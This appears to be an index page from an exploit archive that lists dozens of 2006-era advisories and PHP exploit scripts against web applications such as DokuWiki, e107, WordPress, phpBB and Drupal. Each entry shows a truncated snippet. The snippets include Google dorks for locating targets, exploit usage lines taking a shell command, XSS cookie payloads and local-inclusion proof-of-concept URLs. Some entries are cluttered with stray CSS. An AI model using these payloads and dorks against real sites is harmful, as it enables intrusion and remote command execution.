DokuWiki <= 2006-03-09brel /bin/dwpage.php remote commands execution

#!/usr/bin/php -q -d short_open_tag=on http://retrogod.altervista.org dork: "Driven by DokuWiki" '); /* works with register_argc_argv = On */ if ($argc<4) { print_r(' -

PHPFusion <= 6.01.4 extract()/_SERVER[REMOTE_ADDR] sql injection exploit

#!/usr/bin/php -q -d short_open_tag=on http://retrogod.altervista.org '); /* works with register globals = *Off* magic_quotes_gpc = Off explaination: vulnerable code in maincore.php at lines 15-21: ... if

e107 <= 0.75 GLOBALS[] overwrite/Zend_Hash_Del_Key_Or_Index remote commands execution

#!/usr/bin/php -q -d short_open_tag=on http://retrogod.altervista.org dork: "This site is powered by e107"|inurl:e107_plugins|e107_handlers|e107_files '); /* works with register_globals=On against PHP < 4.4.1, 5

Simple Machines Forum <=1.1RC2 unset() vulnerabilities

php/zend_hash_del_key_or_index_vulnerability.html SMF team released 1.0.8 and 1.1.rc3 versions to patch theese issues ---- rgod site: http://retrogod.altervista.org mail: rgod at autistici.org

CubeCart <= 3.0.11 SQL injection & cross site scripting

ecart]/admin/login.php?email=";>alert(document.cookie) ---- rgod 17/08/20067.15.36 site: http://retrogod.altervista.org mail: rgod at autistici.org original advisory: http://retrogod.altervista.org/cubecart_3011_adv.html

XMB <= 1.9.6 Final basename()/'langfilenew' arbitrary local inclusion / remote commands execution

#!/usr/bin/php -q -d short_open_tag=on http://retrogod.altervista.org\n";; echo "dork: \"Powered by XMB\"\n\n"; /* works regardless of php.ini settings */ if ($argc<6) { echo "Usage: php ".$argv[0]." host path username password cmd OPTIONS\n"; echo "host: target server (ip/hostname)\

SendCard <= 3.4.0 unauthorized administrative access / remote commands execution

#!/usr/bin/php -q -d short_open_tag=on http://retrogod.altervista.org\n";; echo "dork: \"Powered by sendcard - an advanced PHP e-card program\"\n\n"; if ($argc<4) { echo "Usage: php ".$argv[0]." host path action [location] [cmd] OPTIONS\n"; echo "host: target server (ip/hostname)\n"; ec

ATutor <= 1.5.3.1 'links' blind SQL injection / admin credentials disclosure

#!/usr/bin/php -q -d short_open_tag=on http://retrogod.altervista.org\n";; echo "dork, version specific: \"Web site engine's code is copyright\" \"2001-2006 ATutor\" \"About ATutor\"\n\n"; /* - works regardless of php.ini settings - with Mysql >= 4.1 (allowing SELECT subqueries for ORDER BY

PHP ip2long() function circumvention

.$thisIp."'".' or banip='."'".$thisIpMask[0]."'".' or //<--- sql injection banip='."'".$thisIpMask[1]."'".' or banip='."'".$user_id."'"); echo mysql_error(); if($res and mysql_num_rows($res)>0) return TRUE; else return FALSE; } 1.05 29/07/2006 rgod http://retrogod.altervista.org/php_ip2long.htm

Etomite CMS <= 0.6.1 'rfiles.php' remote command execution

#!/usr/bin/php -q -d short_open_tag=on http://retrogod.altervista.org\r\n";; echo "google dork: \"Content managed by the Etomite Content Management System\"\r\n\r\n"; /* works regardless of php.ini settings */ if ($argc<4) { echo "Usage: php ".$argv[0]." host path cmd OPTIONS\r\n"; echo

LoudBlog <=0.5 Sql injection

#!/usr/bin/php -q -d short_open_tag=on http://retrogod.altervista.org\r\n";; echo "a dork: \"Powered by LoudBlog\"\r\n\r\n"; /* works regardless of magic_quotes_gpc settings */ if ($argc<3) { echo "Usage: php ".$argv[0]." host path OPTIONS\r\n"; echo "host: target server (ip/hostname)

ToendaCMS <= 1.0.0 arbitrary file upload

just modified the geeklog one to works against toenda, poc: http://retrogod.altervista.org/toenda_100_shizouka_xpl.html

MyBulletinBoard (MyBB) 1.1.5 'CLIENT-IP' sql injection

#!/usr/bin/php -q -d short_open_tag=on http://retrogod.altervista.org\n";; echo "dork, version specific: \"Powered By MyBB\" \"2006 MyBB Group\"\n\n"; /* works regardless of php.ini settings */ if ($argc<3) { echo "Usage: php ".$argv[0]." host path OPTIONS\n"; echo "host: target server

phpbb 3.x sql injection (with global moderator rights)

r than 2 (admin)\n"; echo " -x: disclose table prefix through error messages\n"; echo "Example:\r\n"; echo "php ".$argv[0]." localhost /phpbb3/ rgod suntzu-u-u\r\n"; echo "php ".$argv[0]." localhost /phpbb3/ rgod suntzu-u-

PHORUM 5 arbitrary local inclusion

#!/usr/bin/php -q -d short_open_tag=on http://retrogod.altervista.org\n";; echo "dork: \"This forum powered by Phorum.\"\n\n"; /* works with: register_globals=On magic_quotes_gpc=Off */ if ($argc<6) { echo "Usage: php ".$argv[0]." host path user pass cmd OPTIONS\n"; echo "host: targe

flatnuke <= 2.5.7 arbitrary php file upload

rgod site: http://rgod.altervista.org mail: rgod @ autistici.org original url: http://retrogod.altervista.org/flatnuke257_adv.html

PAPOO <=3RC3 sql injection / admin credentials disclosure

#!/usr/bin/php -q -d short_open_tag=on http://retrogod.altervista.org\n";; echo "dork: \"Help * Contact * Imprint * Sitemap\" | \"powered by papoo\" | \"powered by cms papoo\"\n\n"; /* notes: works regardless of magic_quotes_gpc settings... there is some magic quotes disable code in variabl

Pivot <=1.30rc2 privilege escalation / remote commands execution

#!/usr/bin/php -q -d short_open_tag=on http://retrogod.altervista.org\n";; echo "dorks: \"Powered byPivot\"\n"; echo "version specific: \"Powered byPivot - 1.30 RC2\" +Rippersnapper\n\n"; /* works with register_globals=On */ if ($argc<4) { echo "Usage: php ".$argv[0]." host path cmd OPTION

BLOG:CMS <= 4.0.0k sql injection

#!/usr/bin/php -q -d short_open_tag=on http://retrogod.altervista.org\n";; echo "dork: \"Powered by BLOG:CMS\"|\"Powered by blogcms.com\"|\"2003-2004, Radek Hulán\"\n\n"; if ($argc<3) { echo "Usage: php ".$argv[0]." host path OPTIONS\n"; echo "host: target server (ip/hostname)\n"; echo

Jaws <= 0.6.2 'Search gadget' SQL injection

#!/usr/bin/php -q -d short_open_tag=on http://retrogod.altervista.org\r\n";; echo "dork: \"powered by jaws\" | \"powered by the jaws project\" | inurl:?gadget=search\r\n\r\n"; /* works regardless of php.ini settings if 'Search gadget' is enabled */ if ($argc<3) { echo "Usage: php ".$argv[

Mambo <= 4.6rc1 sql injection

#!/usr/bin/php -q -d short_open_tag=on http://retrogod.altervista.org\r\n";; echo "this is called the Sun-Tzu 'trascendental guru meditation' tecnique\r\n\r\n"; if ($argc<5) { echo "Usage: php ".$argv[0]." host path user pass OPTIONS\r\n"; echo "host: target server (ip/hostname)\r\n";

bitweaver <= v1.3 multiple vulnerabilities

#!/usr/bin/php -q -d short_open_tag=on http://retrogod.altervista.org\r\n";; echo "dork: \"powered by bitweaver\"\r\n\r\n"; if ($argc<4) { echo "Usage: php ".$argv[0]." host path cmd OPTIONS\r\n"; echo "host: target server (ip/hostname)\r\n"; echo "path: path to bitweaver\r\n"; ec

blur6ex <= 0.3.462 'ID' blind sql injection

#!/usr/bin/php -q -d short_open_tag=on http://retrogod.altervista.org\r\n";; echo "dork: \"powered by blur6ex\"\r\n\r\n"; /* works regardless of php.ini settings */ if ($argc<3) { echo "Usage: php ".$argv[0]." host path OPTIONS\r\n"; echo "host: target server (ip/hostname)\r\n"; echo

LifeType <=1.0.4 'articleId' SQL injection

#!/usr/bin/php -q -d short_open_tag=on http://retrogod.altervista.org\r\n";; echo "dork: \"Powered by LifeType\" \"RSS 0.90\" \"RSS 1.0\" \"RSS 2.0\" \"Valid XHTML 1.0 Strict and CSS\"\r\n\r\n"; /* works regardless of magic_quotes_gpc settings */ if ($argc<3) { echo "Usage: php ".$argv[0].

DotClear <= 1.2.4 'blog_dc_path' (php5) arbitrary remote inclusion

#!/usr/bin/php -q -d short_open_tag=on http://retrogod.altervista.org\r\n\r\n";; echo "dork: \"propulsé par DotClear\" \"fil atom\" \"fil rss\" +commentaires\r\n\r\n"; /* works with PHP5 register_globals=On, allow_url_fopen=On */ if ($argc<5) { echo "Usage: php ".$argv[0]." host path ft

Pixelpost <= 1-5rc1-2 multiple vulnerabilities

#!/usr/bin/php -q -d short_open_tag=on http://retrogod.altervista.org\r\n";; echo "dork: pixelpost \"RSS 2.0\" \"ATOM feed\" \"Valid xHTML / Valid CSS\"\r\n\r\n"; /* works with: magic_quotes_gpc=Off */ if ($argc<5) { echo "Usage: php ".$argv[0]." host path your_ip cmd OPTIONS\r\n"; echo

Re: # MHG Security Team --- PHP NUKE All version Remote File Inc.

in all mentioned files we have: ... $phpbb_root_path = "./../"; require($phpbb_root_path . 'extension.inc'); ... so I would like to see how this can work...

pppBlog <= 0.3.8 administrative credentials/system disclosure

#!/usr/bin/php -q -d short_open_tag=on http://retrogod.altervista.org\r\n\r\n";; echo "dork: intext:\"Powered by pppblog\"\r\n\r\n"; /* works with: register_globals=On */ if ($argc<4) { echo "Usage: php ".$argv[0]." host path path_to_file OPTIONS\r\n"; echo "host: target server (i

Wordpress <=2.0.2 'cache' shell injection

#!/usr/bin/php -q -d short_open_tag=on http://retrogod.altervista.org |\r\n"; echo "| dork: inurl:wp-login.php Register Username Password -echo|\r\n"; echo "\r\n"; /* this works: regardles

Drupal <= 4.7 attachment/mod_mime remote code execution

#!/usr/bin/php -q -d short_open_tag=on http://retrogod.altervista.org\r\n\r\n";; /* this works with a user account with upload rights and with permissions to modify stories, however this is only a poc, you can do the same uploading an attachment through any module, like this, with double exte

Mambo <= 4.6. RC1 xss

ger/preview.php?img_title=%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E --- rgod site: http://retrogod.altervista.org mail: rgod at autistici org ---

Nucleus CMS <= 3.22 arbitrary remote inclusion

#!/usr/bin/php -q -d short_open_tag=on http://retrogod.altervista.org\r\n\r\n";; echo "this is called the \"deadly eyes of Sun-tzu\"\r\n"; echo "dork: Copyright . Nucleus CMS v3.22 . Valid XHTML 1.0 Strict . Valid CSS . Back to top\r\n\r\n"; /* works with: register_globals=Om allow_url_fope

XOOPS <= 2.0.13.2 'xoopsOption[nocommon]' exploit

#!/usr/bin/php -q -d short_open_tag=on http://retrogod.altervista.org\r\n\r\n";; /* works with: magic_quotes_gpc = Off register_globals = On */ if ($argc<4) { echo "Usage: php ".$argv[0]." host path cmd OPTIONS\r\n"; echo "host: target server (ip/hostname)\r\n"; echo "path:

DeluxeBB <= v1.06 attachment mod_mime exploit

#!/usr/bin/php -q -d short_open_tag=on http://retrogod.altervista.org\r\n";; echo "tested & working against a fresh deluxebb installation\r\n\r\n"; if ($argc<4) { echo "Usage: php ".$argv[0]." host path cmd OPTIONS\r\n"; echo "host: target server (ip/hostname)\r\n"; echo "path: pat

PHP-Fusion <= 6.00.306 "srch_where" SQL injection / admin credentials disclosure

#!/usr/bin/php -q -d short_open_tag=on http://retrogod.altervista.org\r\n\r\n";; if ($argc<5) { echo "Usage: php ".$argv[0]." host path user pass OPTIONS\r\n"; echo "host: target server (ip/hostname)\r\n"; echo "path: path to PHP-Fusion\r\n"; echo "user/pass: you need an account\r\

Sugar Suite Open Source <= 4.2 "OptimisticLock!" arbitrary remote inclusion exploit

#!/usr/bin/php -q -d short_open_tag=on http://retrogod.altervista.org\r\n\r\n";; echo "this is called the \"five claws of Sun-tzu\"\r\n\r\n"; if ($argc<5) { echo "Usage: php ".$argv[0]." host path location cmd OPTIONS\r\n"; echo "host: target server (ip/hostname)\r\n"; echo "path:

PhpBB <= 2.0.20 Admin/Restore Database remote cmmnds xctn (works with admin sid)

an admin or whoever succeed to find admin sid is able to launch commands, advisory/poc exploit: http://retrogod.altervista.org/phpbb_2020_admin_xpl.html

PHPBB 2.0.20 persistent issues with avatars

TTP/1.0 HOST: some_vulnerable.host Connection: close obviously you have no output, but this makes phpbb to be like a http proxy (3) inject some php code inside jpeg files as EXIF metadata content: this, in combinations with third party vulnerable code c

Unclassified NewsBoard <= 1.6.1 patch 1 ABBC[Config][smileset] arbitrary local inclusion

#!/usr/bin/php -q -d short_open_tag=on http://retrogod.altervista.org\r\n\r\n";; echo "works with register_globals = On & magic_quotes_gpc = Off\r\n\r\n"; if ($argc<6) { echo "Usage: php ".$argv[0]." host path user pass cmd OPTIONS\r\n"; echo "host: target server (ip/hostname)\r\n"; ech

PHPFusion <= v6.00.306 avatar mod_mime arbitrary file upload & local inclusion vulnerabilities

#!/usr/bin/php -q -d short_open_tag=on http://retrogod.altervista.org\r\n\r\n";; if ($argc<6) { echo "Usage: php ".$argv[0]." host path user pass cmd OPTIONS\r\n"; echo "host: target server (ip/hostname)\r\n"; echo "path: path to PHPFusion\r\n"; echo "cmd: a shell command\r\n

X7 Chat <=2.0 remote commands execution

#!/usr/bin/php -q -d short_open_tag=on http://retrogod.altervista.org\r\n";; echo "-> works regardless of magic_quotes_gpc settings\r\n"; echo " if avatar uploads are enabled (default)\r\n"; echo "dork: intitle:\"X7 Chat Help Center\" | \"Powered By X7 Chat\"\r\n\r\n"; if ($argc<4) { echo

PHPSurveyor <= 0.995 'save.php/surveyid' remote cmmnds xctn

#!/usr/bin/php -q -d short_open_tag=on http://retrogod.altervista.org *\r\n"; echo "* a special tnX goes to Frozen for his dork! *\r\n"; echo "* and a thanks to all people of johnny.ihackstuff.com!!*\r\n"; echo "* site: http://retrogod.altervista.org

PCPIN Chat <= 5.0.4 "login/language" remote cmmnds xctn

#!/usr/bin/php -q -d short_open_tag=on http://retrogod.altervista.org\r\n\r\n";; echo "-> works with magic_quotes_gpc = Off\r\n"; echo "dork: \"powered by PCPIN.com\"\r\n\r\n"; if ($argc<4) { echo "Usage: php ".$argv[0]." host path cmd OPTIONS\r\n"; echo "host: target server (ip/hostname)\r\n

- PHPGraphy <= 0.9.11 "editwelcome" unauthorized access / cross site scripting -

o insert html/ /javascript code or simply deface the main page temporary patch -> replace this line: ... if ($updwelcome && isset($welcomedata) && check_welcome($dir)) { ... with: ... if ($admin && $updwelcome && isset($welcomedata) && check_welcome($dir

osCommerce "extras/" information/source code disclosure

print nl2br(htmlentities(implode($readme, ' '))); print "Continue\n"; print "\n"; exit; } } ... google search: inurl:"extras/update.php" intext:mysql.p

Simplog <=0.9.2 multiple vulnerabilities

#!/usr/bin/php -q -d short_open_tag=on http://retrogod.altervista.org\r\n\r\n";; echo "dork: intext:\"Powered by simplog\"\r\n\r\n"; if ($argc<5) { echo "Usage: php ".$argv[0]." host path location cmd OPTIONS\r\n"; echo "host: target server (ip/hostname)\r\n"; echo "path: path to simplog

PHPList <= 2.10.2 remote commands execution

#!/usr/bin/php -q -d short_open_tag=on http://retrogod.altervista.org\r\n\r\n";; echo "-> this works against register_globals=On \r\n"; echo "a dork: inurl:\"lists/?p=subscribe\" | inurl:\"lists/index.php?p=subscribe\"\r\n"; echo " -ubbi phplist\r\n\r\n"; if ($argc<4) { echo "Usage: php ".$argv[0

PhpOpenChat 3.0.x ADODB Server.php "sql" SQL injection

#!/usr/bin/php -q -d short_open_tag=on http://retrogod.altervista.org\r\n\r\n";; echo "dork: Welcome to your PHPOpenChat-Installation!\r\n\r\n"; if ($argc<4) { echo "Usage: php ".$argv[0]." host path cmd OPTIONS\r\n"; echo "host: target server (ip/hostname)\r\n"; echo "path: path to PhpO

PHPMyChat 0.15.0dev "SYS enter" remote commands xctn (not properly patched from previous versions)

#!/usr/bin/php -q -d short_open_tag=on http://retrogod.altervista.org\r\n\r\n";; echo "-> works with magic_quotes_gpc=Off\r\n\r\n"; echo "dork: intext:\"2000-2001 The phpHeaven Team\" -sourceforge\r\n\r\n"; if ($argc<4) { echo "Usage: php ".$argv[0]." host path cmd OPTIONS\r\n"; echo "host: t

ReloadCMS <= 1.2.5stable Cross site scripting / remote command execution

http://reloadcms.com/ description: "ReloadCMS is a free CMS written on PHP and based on flat files." vulnerability: ReloadCMS do not properly sanitize User-Agent request header before to store it in stats.dat file. Example of attack, through netcat: rgod>nc target.ho

PHP-Stats <= 0.1.9.1 remote commands execution

ost: [host] Connection: Close iii) information disclosure, you can go to: http://[target]/[path]/checktables.php to see at screen database table_prefix, making easier the exploitation process... ---

4images <=1.7.1 remote code execution

his can be exploited to include files having the template file extension (".html") from local resources via directory traversal attacks" and classified it as low risk... this is true on PHP5 but not on PHP4 where you can break the .html extension by a null char rgod site: http://retrogod.altervista.org mail: rgod at autistici.org original advisory: http://retrogod.altervista.org/4images_171_adv.html

NOCC Webmail <= 1.0 multiple vulnerabilities

ize: 0.8em !important} h4,h5,h6{font-size: 0.8em !important} h1 font {font-size: 0.8em !important} h2 font {font-size: 0.8em !important}h3 font {font-size: 0.8em !important} h4 font,h5 font,h6 font {font-size: 0.8em !important} * {font-style: normal !important} *{text-decoration: none !i

Coppermine Photo Gallery <=1.4.3 remote code execution

arget]/[path]/docs/showdoc.php?f=c:\boot.ini http://[target]/[path]/docs/showdoc.php?f=\\192.168.1.2\c\shell.php (the last one from a samba resource...) if magic_quotes_gpc=on, "c:\\boot.ini" after stripslashes becomes "c:\boot.ini" (cause striplashes do not remove all "\"s ) and "\

PHPKIT >= 1.6.1r2 arbitrary local/remote inclusion (unproperly patched in previous versions)

font-size: 0.8em !important} * {font-style: normal !important} *{text-decoration: none !important} a:link,a:active,a:visited { text-decoration: none ; color : #99aa33; } a:hover{text-decoration: underline; color : #33; } .Stile5 {font-family: Verdana, Arial, Helvetica, sans-serif; font-size:

EGS Enterprise Groupware System 1.0 rc4 remote commands execution & FlySpray 0.9.7 remote commands execution

rtant} h4,h5,h6{font-size: 0.8em !important} h1 font {font-size: 0.8em !important} h2 font {font-size: 0.8em !important}h3 font {font-size: 0.8em !important} h4 font,h5 font,h6 font {font-size: 0.8em !important} * {font-style: normal !important} *{text-decoration: none !important} a:li

DocMGR <= 0.54.2 arbitrary remote inclusion

t} *{text-decoration: none !important} a:link,a:active,a:visited { text-decoration: none ; color : #99aa33; } a:hover{text-decoration: underline; color : #33; } .Stile5 {font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; } .Stile6 {font-family: Verdana, Arial, Helvetica, sans-

Linpha <= 1.0 multiple arbitrary local inclusion

SER | ERROR | 20060211 035519 | 192.168.1.5 | User : login failed! now, if magic_quotes_gpc = Off on target system, you can launch operating system commands, poc: http://[target]/[path]/docs/index.php?cmd=ls%20-la&lang=/../../sql/tmp/linpha.log%00 (same technique with install dir scripts...) rgod site: http://retrogod.altervista.org mail: rgod at autistici org original adivsory: http://retrogod.altervista.org/linpha_10_local.html

runCMS <= 1.3a2 possible remote code execution through the integrated FCKEditor package

FCKEditor 2.0 <= 2.2) -- rgod site: http://retrogod.altervista.org mail: rgod at autistici org --

CPGNuke Dragonfly 9.0.6.1 remote commands execution through arbitrary local inclusion

normal !important} *{text-decoration: none !important} a:link,a:active,a:visited { text-decoration: none ; color : #99aa33; } a:hover{text-decoration: underline; color : #33; } .Stile5 {font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; } .Stile6 {font-family: Ve

LoudBlog <= 0.4 arbitrary remote inclusion

text-decoration: none !important} a:link,a:active,a:visited { text-decoration: none ; color : #99aa33; } a:hover{text-decoration: underline; color : #33; } .Stile5 {font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; } .Stile6 {font-family: Verdana, Arial, Helvetica, sans-serif;